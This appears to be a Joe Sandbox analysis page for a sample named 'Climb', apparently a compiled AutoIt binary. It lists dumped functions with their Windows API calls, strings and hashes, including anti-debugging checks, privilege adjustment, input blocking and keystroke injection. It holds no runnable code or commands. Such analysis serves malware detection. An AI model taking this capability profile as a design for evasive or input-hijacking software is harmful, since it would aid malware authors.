GetFileAttributesW.KERNEL32(?), ref: 00ACE491
FindFirstFileW.KERNEL32(?,?), ref: 00ACE4A2
FindClose.KERNEL32(00000000), ref: 00ACE4AE

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 94b1c27a549b01e4a9dbf1093c9d4d4c1086da28393fae2ac8fbf31b2edfe6f6
Instruction ID: 18af3a7d6a213b13fbbc4a578ceca4a6f36fd400fa41bb9bdab8f829855f12de
Opcode Fuzzy Hash: 94b1c27a549b01e4a9dbf1093c9d4d4c1086da28393fae2ac8fbf31b2edfe6f6
Instruction Fuzzy Hash: 4AF0A030410D10579215E7B8AD0D8BA766EAE02335B504749F836C20E0E779999696D5

Function 00ABE5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00ABE5F8

Strings

%.3d, xrefs: 00ABE603
X64, xrefs: 00ABE680

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 71e653d2e3fe4ab377bb49294278c0775b3a7729ab06905fdc54be51ce7dd4f3
Instruction ID: 33399e94ad351f70c414a0363577630f5ced9f1830355bbf781d0a0137f5a474
Opcode Fuzzy Hash: 71e653d2e3fe4ab377bb49294278c0775b3a7729ab06905fdc54be51ce7dd4f3
Instruction Fuzzy Hash: 6DD012B1C04118DADB80D7909D58DF973BCAB18300F10C892F90AD1011E6209904A721

Function 00A92992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00A92A8A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00A92A94
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00A92AA1

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: d90cab12d77bcec3aa9d3eed82d00f139a9e8997bdd335063e7afa8876278a48
Instruction ID: 1aebff74ecc72d4c748b3ea20d8026741ca0dabbfb185fb2e9a6fcb063e306f2
Opcode Fuzzy Hash: d90cab12d77bcec3aa9d3eed82d00f139a9e8997bdd335063e7afa8876278a48
Instruction Fuzzy Hash: 5B319675901218ABCB61DF64D989799BBB4AF08310F5042DAE41CA7261E7709B85CF45

Function 00AC2010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00A8014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00A809D8
Part of subcall function 00A8014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00A809F5

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AC205A
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AC2087
GetLastError.KERNEL32 ref: 00AC2097

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: f0471d2168ce9d6a1f64d4c7f235efb858166b1695bf1a70d74ae5f36e156cb7
Instruction ID: e09ad988b3940c1b9e90228a1e8c225eaad9dbc4de567656651166f49b1a80be
Opcode Fuzzy Hash: f0471d2168ce9d6a1f64d4c7f235efb858166b1695bf1a70d74ae5f36e156cb7
Instruction Fuzzy Hash: A711BFB2400304AFD718AF94DC86E6BB7B9FB04710B21851EE04657251DB70BC42CB24

Function 00A85058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00A8502E,?,00B298D8,0000000C,00A85185,?,00000002,00000000), ref: 00A85079
TerminateProcess.KERNEL32(00000000,?,00A8502E,?,00B298D8,0000000C,00A85185,?,00000002,00000000), ref: 00A85080
ExitProcess.KERNEL32 ref: 00A85092

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 4f3c6c011da7b27ce75abb7605869bb44f259b5e695cea77093d6f98c7f68147
Instruction ID: a4f520df029ec55d7353f7ee66fd72db69b89dd92b63cbc33e6aee37027103c7
Opcode Fuzzy Hash: 4f3c6c011da7b27ce75abb7605869bb44f259b5e695cea77093d6f98c7f68147
Instruction Fuzzy Hash: 0DE0B632800548AFCF22BFA4DE09E683B7AEB51381F514514FD599A521DB35ED52CBC1

Function 00ABE652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00ABE664

Strings

X64, xrefs: 00ABE680

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: c6184ad27bfa9990b595021ca100074d191b784e86e5aee51b195bb43dd50071
Instruction ID: ef8eb7cc3e69d9b69ccd67300b03212ba2520eaaf441f62993cef7eb77ca36b1
Opcode Fuzzy Hash: c6184ad27bfa9990b595021ca100074d191b784e86e5aee51b195bb43dd50071
Instruction Fuzzy Hash: 4FD0C9B480111DEACF80CB90EC88DD9777CBB04304F104692F106E2000DB3095498B10

Function 00AD41FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00AE52EE,?,?,00000035,?), ref: 00AD4229
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00AE52EE,?,?,00000035,?), ref: 00AD4239

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: a7d0cd3191c902e382a0eeb7d60f3c60da6ba1816f68bede70209363fb272b36
Instruction ID: 5c17b258b91cf06d071bc5ac294a6389de81d0ee71d08fcf9c18c9440858b063
Opcode Fuzzy Hash: a7d0cd3191c902e382a0eeb7d60f3c60da6ba1816f68bede70209363fb272b36
Instruction Fuzzy Hash: 9FF0A0306002246AE72057A59C4DFEB367EEF89761F00026AF505D2281DA709A40C6B0

Function 00ACBBED Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00ACBC24
keybd_event.USER32(?,76AAC0D0,?,00000000), ref: 00ACBC37

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 36f055821292a28e720237ec2ea34587bb714ef5f70f222600a3b29356aade1e
Instruction ID: ad17d6ef4d956cde7119b7f79e6fbd0a275447270278fdac78e084d1e48d7746
Opcode Fuzzy Hash: 36f055821292a28e720237ec2ea34587bb714ef5f70f222600a3b29356aade1e
Instruction Fuzzy Hash: FBF06D7080424DABDB01DFA4C806BFE7BB0FF08309F008409F951AA191C3798201DFA4

Function 00AC1A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AC1B48), ref: 00AC1A20
CloseHandle.KERNEL32(?,?,00AC1B48), ref: 00AC1A35

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 5a05f32be30142963b9bfd704589de8023d44eefe658b5d415e0a3a46d72d24f
Instruction ID: e1480ee307c37c1ec0e9d3d905bd817515db2344da09c1cea4e40a5f58dea35b
Opcode Fuzzy Hash: 5a05f32be30142963b9bfd704589de8023d44eefe658b5d415e0a3a46d72d24f
Instruction Fuzzy Hash: C1E04F72004610AFE7262B50FC09F73B7A9EB04320F14891DF59680470DB62AC91EB10

Function 00ADF4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00ADF51A

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: bfc14cf5dabcd0544020752e5869101ce3149515a2116a67f9be8ff489d5146d
Instruction ID: d1357259cf5237ca4aa3ce3e880dfee375502830c94be7b0c5a228e12fd013fd
Opcode Fuzzy Hash: bfc14cf5dabcd0544020752e5869101ce3149515a2116a67f9be8ff489d5146d
Instruction Fuzzy Hash: 4CE048362102045FC710DF69E404957F7E8EFA4761F008426F84BC7351D670F941CB90

Function 00ACEC9E Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00ACECC7

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 88f2dfa9d049d58267b25daf7b05f38696597733af28422da9d987f0b3648e97
Instruction ID: ab1a136451f338135213b2ddc1cf28ad5dc7562185f26ebc5c4677acf15c5a1e
Opcode Fuzzy Hash: 88f2dfa9d049d58267b25daf7b05f38696597733af28422da9d987f0b3648e97
Instruction Fuzzy Hash: F9D05EB619C20138E81ECB398E2FF762509E701741F8A068DB202C96D8E5E19D00A061

Function 00A80D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00A8075E), ref: 00A80D4A

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 82c9d48cf6091ec1f9709a53be0b39ef0fc7bfc11e1213813018c2ed38462320
Instruction ID: 7d389115c6bdfe2114dbb84b23c5e9bb200597b63d2b0c287abdb7629c81d2d8
Opcode Fuzzy Hash: 82c9d48cf6091ec1f9709a53be0b39ef0fc7bfc11e1213813018c2ed38462320
Instruction Fuzzy Hash:

Function 00AE353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00AE358D
DeleteObject.GDI32(00000000), ref: 00AE35A0
DestroyWindow.USER32 ref: 00AE35AF
GetDesktopWindow.USER32 ref: 00AE35CA
GetWindowRect.USER32(00000000), ref: 00AE35D1
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00AE3700
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00AE370E
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE3755
GetClientRect.USER32(00000000,?), ref: 00AE3761
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00AE379D
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE37BF
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE37D2
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE37DD
GlobalLock.KERNEL32(00000000), ref: 00AE37E6
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE37F5
GlobalUnlock.KERNEL32(00000000), ref: 00AE37FE
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE3805
GlobalFree.KERNEL32(00000000), ref: 00AE3810
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE3822
OleLoadPicture.OLEAUT32(?,00000000,00000000,00B00C04,00000000), ref: 00AE3838
GlobalFree.KERNEL32(00000000), ref: 00AE3848
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00AE386E
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00AE388D
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE38AF
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE3A9C

Strings

, xrefs: 00AE3A22
DISPLAY, xrefs: 00AE38FF
AutoIt v3, xrefs: 00AE374F
static, xrefs: 00AE3797, 00AE38EE

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: c59ca3b05558334c77e074487e37b4cecf7fd02682255c91dbc9b8e93e2e0427
Instruction ID: 7d519a362b66dddc9c1d4399584e15172aa42a08b8224a8737770e034d6803bf
Opcode Fuzzy Hash: c59ca3b05558334c77e074487e37b4cecf7fd02682255c91dbc9b8e93e2e0427
Instruction Fuzzy Hash: E1026072900205AFDB15DFA5CD49EAE7BBAFF48310F148558F915AB2A1CB74EE01CB60

Function 00AF7B0D Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00AF7B67
GetSysColorBrush.USER32(0000000F), ref: 00AF7B98
GetSysColor.USER32(0000000F), ref: 00AF7BA4
SetBkColor.GDI32(?,000000FF), ref: 00AF7BBE
SelectObject.GDI32(?,?), ref: 00AF7BCD
InflateRect.USER32(?,000000FF,000000FF), ref: 00AF7BF8
GetSysColor.USER32(00000010), ref: 00AF7C00
CreateSolidBrush.GDI32(00000000), ref: 00AF7C07
FrameRect.USER32(?,?,00000000), ref: 00AF7C16
DeleteObject.GDI32(00000000), ref: 00AF7C1D
InflateRect.USER32(?,000000FE,000000FE), ref: 00AF7C68
FillRect.USER32(?,?,?), ref: 00AF7C9A
GetWindowLongW.USER32(?,000000F0), ref: 00AF7CBC

Part of subcall function 00AF7E22: GetSysColor.USER32(00000012), ref: 00AF7E5B
Part of subcall function 00AF7E22: SetTextColor.GDI32(?,00AF7B2D), ref: 00AF7E5F
Part of subcall function 00AF7E22: GetSysColorBrush.USER32(0000000F), ref: 00AF7E75
Part of subcall function 00AF7E22: GetSysColor.USER32(0000000F), ref: 00AF7E80
Part of subcall function 00AF7E22: GetSysColor.USER32(00000011), ref: 00AF7E9D
Part of subcall function 00AF7E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AF7EAB
Part of subcall function 00AF7E22: SelectObject.GDI32(?,00000000), ref: 00AF7EBC
Part of subcall function 00AF7E22: SetBkColor.GDI32(?,?), ref: 00AF7EC5
Part of subcall function 00AF7E22: SelectObject.GDI32(?,?), ref: 00AF7ED2
Part of subcall function 00AF7E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00AF7EF1
Part of subcall function 00AF7E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AF7F08
Part of subcall function 00AF7E22: GetWindowLongW.USER32(?,000000F0), ref: 00AF7F15

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 483254eb4faa4e8c3d0b8bf6de54bb21d87c6dc2965b8a33a996f8a29cf7e9b5
Instruction ID: c6d26be3cb657eb4670c455ed9b2ae032101db2eb38b990883a6425221ff750d
Opcode Fuzzy Hash: 483254eb4faa4e8c3d0b8bf6de54bb21d87c6dc2965b8a33a996f8a29cf7e9b5
Instruction Fuzzy Hash: B3A16C72008305AFD712DFE4DC48E7FBBAAFB49325F100A19FA62961A0D771D946CB51

Function 00A61625 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00A616B4
SendMessageW.USER32(?,00001308,?,00000000), ref: 00AA2B07
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00AA2B40
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00AA2F85

Part of subcall function 00A61802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A61488,?,00000000,?,?,?,?,00A6145A,00000000,?), ref: 00A61865

SendMessageW.USER32(?,00001053), ref: 00AA2FC1
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00AA2FD8
ImageList_Destroy.COMCTL32(00000000,?), ref: 00AA2FEE
ImageList_Destroy.COMCTL32(00000000,?), ref: 00AA2FF9

Strings

0, xrefs: 00AA2E11

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: ca68d182813a468cc7152d2f346e88b04f9eb3819ab5be8c0b79a66f0d473f2d
Instruction ID: e2b09a0cd94460812e66795979571caebd0e9433defa58595041095a45b748d2
Opcode Fuzzy Hash: ca68d182813a468cc7152d2f346e88b04f9eb3819ab5be8c0b79a66f0d473f2d
Instruction Fuzzy Hash: A712A074204201EFD725DF68C984BB9BBF1FB46310F284569F4959B6A1CB31ECA2CB91

Function 00AE316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00AE319B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00AE32C7
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00AE3306
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00AE3316
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00AE335D
GetClientRect.USER32(00000000,?), ref: 00AE3369
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00AE33B2
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00AE33C1
GetStockObject.GDI32(00000011), ref: 00AE33D1
SelectObject.GDI32(00000000,00000000), ref: 00AE33D5
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00AE33E5
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AE33EE
DeleteDC.GDI32(00000000), ref: 00AE33F7
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00AE3423
